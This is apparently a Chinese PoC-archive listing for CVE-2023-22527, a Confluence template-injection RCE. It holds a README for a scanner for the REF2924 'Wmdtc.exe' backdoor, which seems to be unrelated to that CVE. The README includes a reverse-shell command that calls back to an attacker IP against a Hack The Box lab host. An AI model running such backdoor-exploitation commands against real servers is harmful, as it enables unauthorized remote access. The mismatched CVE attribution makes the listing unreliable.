关联漏洞
标题:
Atlassian Confluence 安全漏洞
(CVE-2023-22527)
描述:Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。 Atlassian Confluence Data Center and Server存在安全漏洞,该漏洞源于存在模板注入漏洞,允许未经身份验证的攻击者在受影响的实例上实现远程代码执行。
描述
PoC for the NAPLISTENER exploit: https://nvd.nist.gov/vuln/detail/CVE-2023-22527 (Purpose: To practice automating exploits)
介绍
# REF2924
NAPLISTENER is a backdoor scanner for the Wmdtc.exe backdoor associated with the REF2924 APT group.
We can use this tool on both Windows and Linux to scan target servers.
If you find the presence of the field [Microsoft HTTPAPI/2.0], within a website's "/" request header, you can try scanning the organization's backdoor.
When running the script for the first time, it will automatically help you download dependent files
# SCAN
`$ python3 wmdtc_backdoor.py -u "https://napper.htb"`
# Reverse Shell
`$ python3 wmdtc_backdoor.py -u "https://napper.htb" -ip_address 10.10.16.15 -port 10032`
[Reference Documentation](https://github.com/ttate10/CVE-2023-22527/files/15300630/Napper.pdf)
文件快照
[4.0K] /data/pocs/d4ded72dc307cc51a4ee2c2d3723df106caad4dd
├── [ 801] README.md
└── [ 12K] wmdtc_backdoor.py
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。